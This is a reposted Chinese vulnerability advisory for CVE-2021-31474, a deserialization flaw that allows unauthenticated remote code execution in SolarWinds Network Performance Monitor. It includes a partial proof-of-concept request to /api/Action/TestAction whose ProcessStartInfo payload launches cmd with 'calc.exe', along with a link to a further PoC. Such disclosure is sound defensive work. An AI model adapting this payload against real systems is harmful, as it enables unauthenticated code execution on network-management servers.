SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

admin 2021年10月12日01:14:36评论261 views字数 625阅读2分5秒阅读模式

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

文章来源:Khan安全攻防实验室

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)


SolarWinds Network Performance Monitor(NPM)是集网络监测、设备性能维护管理、故障监控、网络实时流量监控和历史数据统计、汇总和历史数据分析等功能于一体的网络管理系统。



该漏洞存在于SolarWinds.Serialization库中,由于对用户提供的数据缺乏正确验证,导致不信任数据的反序列化。成功利用此漏洞的攻击者可以在系统上下文中执行任意代码,而无需经过身份验证。


影响范围

SolarWinds Network Performance Monitor 2020.2.1


Poc:


POST  /api/Action/TestAction 


<sd:ProcessStartInfo Arguments="/c calc.exe" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null }" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" /> 2x Base6


Poc2:


https://gist.github.com/testanull/dcb536b409a28d74430a441d53b14456



SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)


SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

本文始发于微信公众号(黑白之道):SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年10月12日01:14:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SolarWinds NPM远程代码执行漏洞(CVE-2021-31474)https://cn-sec.com/archives/385199.html

发表评论

匿名网友 填写信息